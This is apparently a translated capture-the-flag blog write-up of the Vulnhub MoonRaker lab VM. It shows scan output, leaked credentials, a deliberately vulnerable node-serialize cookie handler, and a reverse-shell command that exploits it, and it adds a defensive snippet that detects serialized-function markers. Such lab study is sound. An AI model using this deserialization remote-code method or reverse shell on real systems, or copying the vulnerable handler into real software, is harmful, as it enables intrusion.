
2019-01-23 Vulnhub penetration testing hands-on writeup (

2019-01-25  最初的美好_kai

MoonRaker.... I picked this one because the cover art looks pretty good.... long legs.... and visiting port 80 even plays a video.



nmap results:

# Nmap 7.40 scan initiated Tue Jan 22 21:47:44 2019 as: nmap -p- -A -sV -Pn -oN 1.xml 192.168.110.143
Nmap scan report for 192.168.110.143
Host is up (0.0012s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
|_  256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp  open  http     Node.js Express framework
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp  open  epmd     Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    couchdb: 42665
5984/tcp  open  couchdb?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Object Not Found
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 58
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:49:14 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: a2af5cdd93
|     X-CouchDB-Body-Time: 0
|     {"error":"not_found","reason":"Database does not exist."}
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 164
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: 8ff88fda87
|     X-CouchDB-Body-Time: 0
|     {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 61
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: e1640da16c
|     X-Couch-Stack-Hash: 1828508689
|     X-CouchDB-Body-Time: 0
|_    {"error":"unknown_error","reason":"badarg","ref":1828508689}
42665/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:85:81:B5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   1.17 ms 192.168.110.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 22 21:50:27 2019 -- 1 IP address (1 host up) scanned in 163.82 seconds

dirb didn't find anything.....


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: result.txt
START_TIME: Tue Jan 22 21:59:27 2019
URL_BASE: http://192.168.110.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.143/ ----
==> DIRECTORY: http://192.168.110.143/accounting/
==> DIRECTORY: http://192.168.110.143/cats/
+ http://192.168.110.143/index.html (CODE:200|SIZE:422)
+ http://192.168.110.143/robots.txt (CODE:200|SIZE:26)
+ http://192.168.110.143/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.110.143/services/

---- Entering directory: http://192.168.110.143/accounting/ ----
+ http://192.168.110.143/accounting/index.php (CODE:200|SIZE:55)

---- Entering directory: http://192.168.110.143/cats/ ----

---- Entering directory: http://192.168.110.143/services/ ----
+ http://192.168.110.143/services/index.html (CODE:200|SIZE:1756)

-----------------
END_TIME: Tue Jan 22 21:59:55 2019
DOWNLOADED: 18448 - FOUND: 5

In the end I spent a long time looking for host vulnerabilities and found nothing; on the web side I only found an XSS, but there's no cookie to steal, so what's the point...
After reading a walkthrough I found the trick: there's a message board under services (it actually writes the input into a log, but we don't know which file name and path it writes to), so you start an Apache server, make the target fetch from it, and then the access log shows you the answer.



Then you know right away which file handles it and can visit it directly... I've learned this trick, it'll come in handy later.

http://192.168.110.143/svc-inq/salesmoon-gui.php

This page has two things worth noting. One is hugo.txt, whose content is:

FYI Hugo's custom page is being rebuilt over on the NodeJS server running on port 3000. Here's a snippet of the backend code for cookie input..this is once you get past the Username/password prompt.

The dev team is still creating most of the front end, but we will have to "secure the code" since we're now not only tasked with sales, but also secure code review. How do they expect to offer all of these extra services without hiring more ppl? Never thought I'd be a nerdy "coder"!

Here's the snippet, you'll need nodejs and other stuff to run. It looks good to me so I've pushed to prod...

//Stuff to import
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();

// cookie-parser must be mounted, otherwise req.cookies is undefined
app.use(cookieParser());

// Here's the function they want reviewed...
// I think it decodes the weird cookie string and runs it, prints it, sets it or idk.

app.get('/', function(req, res) {
    if (req.cookies.profile) {
        // base64-decode the cookie, then hand the string to node-serialize
        var str = new Buffer(req.cookies.profile, 'base64').toString();
        var obj = serialize.unserialize(str);
        if (obj.username) {
            res.send("Stuff here then print out username.. " + escape(obj.username));
        }
    } else {
        // first visit: set the default profile cookie ({"username":"hugo"} in base64)
        res.cookie('profile', "eyJ1c2VybmFtZSI6Imh1Z28ifQ==", {
            maxAge: 900000,
            httpOnly: true
        });
        res.end();
    }
});
app.listen(3000);

Not really being able to read JS is a weak spot I still need to work on..... but the main thing here is the parameter in the cookie.
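A hardened version of that cookie handler, added here as an example (it is not from the original post or from the hugo.txt on the target): node-serialize tags serialized functions with the prefix _$$ND_FUNC$$_ and eval()s such strings on unserialize, so the fix is to treat the cookie as data only (plain JSON.parse) and to reject any field carrying that marker. The function name decodeProfileCookie and the sample cookies are constructed for this example.

```javascript
// Safe replacement for the profile-cookie handler: data only, no unserialize().
const FUNC_MARKER = '_$$ND_FUNC$$_';   // node-serialize's function tag

// Returns { ok: true, username } or { ok: false, reason } for a profile cookie.
function decodeProfileCookie(cookieValue) {
  if (typeof cookieValue !== 'string' || cookieValue.length > 1024) {
    return { ok: false, reason: 'missing or oversized cookie' };
  }
  // Express normally hands over URL-decoded values; also accept raw "%3D" padding.
  let json;
  try {
    json = Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
  } catch (e) {
    return { ok: false, reason: 'bad encoding' };
  }
  let obj;
  try {
    obj = JSON.parse(json);   // JSON.parse never executes anything
  } catch (e) {
    return { ok: false, reason: 'not JSON' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'profile is not an object' };
  }
  // Detection: a string field carrying the function marker is an attempt to
  // smuggle code through unserialize(); reject it and report the field name.
  for (const [key, value] of Object.entries(obj)) {
    if (typeof value === 'string' && value.startsWith(FUNC_MARKER)) {
      return { ok: false, reason: `serialized function in field "${key}"` };
    }
  }
  if (typeof obj.username !== 'string' || !/^[a-z0-9_]{1,32}$/i.test(obj.username)) {
    return { ok: false, reason: 'invalid username' };
  }
  return { ok: true, username: obj.username };
}

// Constructed samples: the default cookie from hugo.txt (as sent in the captured
// request, with %3D padding) and a tainted cookie in the attack's shape whose
// function body is harmless (returns 1, no I/O).
const DEFAULT_COOKIE = 'eyJ1c2VybmFtZSI6Imh1Z28ifQ%3D%3D';
const TAINTED_COOKIE = Buffer.from(
  JSON.stringify({ rce: FUNC_MARKER + 'function (){ return 1 }()' })
).toString('base64');

console.log(decodeProfileCookie(DEFAULT_COOKIE));   // { ok: true, username: 'hugo' }
console.log(decodeProfileCookie(TAINTED_COOKIE));   // { ok: false, reason: 'serialized function in field "rce"' }
```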
The other page to note is http://192.168.110.143/svc-inq/couchnotes.txt, with the following content:

--Our new devs are building a front end to work with CouchDB backend. For now most data collection needs to be done manually.

--For you new sales folks, using curl to interact with couch is slick. Otherwise the front end admin panel is available.
-----Contact me in office if you'd like a user created.

--Quick path to check for DB's created, then you can dive into each if you have permissions.
/_all_dbs
------------For Jaws' eye's only below the line------------------
--my password
hint: girlfriends name + "x99" w/o quotes 

This hints that the CouchDB username is jaws, and the password is Dollyx99. Now we have credentials but there is no CouchDB login page, so what to do? Look for the stock web UI... as follows:
如下:

http://192.168.110.143:5984/_utils/#login

After logging in there are 3 databases; only the one named link is accessible... no permissions on the other two.



Opening link shows four links:

/cats/cats-gallery.html # the cat page from earlier
/surv-cam/recent.html # click this one and look carefully...... enough said
/HR-Confidential/offer-letters.html # there's something in this one
/x-files/deep-space-findings.html # found nothing in here

Here's what the third link leads to...

Combined with the pages seen earlier, the hugo user is the one to look at first, and sure enough there's something there.

There's a username and password here. The earlier nmap scan found a Node.js Express framework that requires credentials to log in, so this should be it... tried it and it worked...

This Node.js app has a deserialization vulnerability that gives a shell directly. First, a reference article:
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

According to the reference, the deserialized field is the profile value in the Cookie header, so we need to intercept the request and generate a payload to get a shell; this is where the credentials obtained earlier come in.
The intercepted request:
GET / HTTP/1.1
Host: 192.168.110.143:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: AuthSession=amF3czo1QzQ5RUFCRjqL4fuwv3GwQ70_iK99c_oPA_8RCw; profile=eyJ1c2VybmFtZSI6Imh1Z28ifQ%3D%3D
Authorization: Basic aHVnbzpUZW1wbGVMYXNlcnNMMks=
Connection: keep-alive
If-None-Match: W/"5c-Hu0fOrq4gpzRr1hphtyepFR+674"
Cache-Control: max-age=0

The cookie value is base64-encoded.
Python script: https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
The process is as follows:

python test.py 192.168.110.128 7777
The generated payload is wrapped in the {"rce":"_$$ND_FUNC$$_function (){ ... }()"} format, and the whole thing is then base64-encoded for the profile cookie.

Then the shell comes straight back; it's not an interactive shell, so a bit of Python is needed for that.
After the reverse shell came back I did some testing and found no write permission, so DirtyCOW is out; also, the earlier hint about the log being cleaned periodically suggested an SUID privesc might be possible, but trying it found that couldn't be written either...
Then the only option left was hunting for config files; went straight to the couchdb directory... and looked at local.ini.



Found hugo's username and password; tried su hugo and it worked.
At this step I got stuck, lol. Nothing for it; the walkthrough says the author left a hint in mail, which you would never normally find....


It gives a password hash and says to add VR00M.
Here I learned the hash cracking tool john in Kali: store the hash in a file, then run john followed by the filename.
So the password is cyberVR00M.

After base64 decoding it reads:
was dolly wearing braces?
Summary:
This really proved that my skills still fall short at challenge difficulty....
First, use an XSS together with the reverse-download trick to get the name and path of the current log-handling file.
Then visit it directly; after gaining database access, obtain the Node.js credentials, then use a deserialization vulnerability to get a shell, then read the config file to get hugo's login, and finally read mail to get the root password hash, crack it and log in.
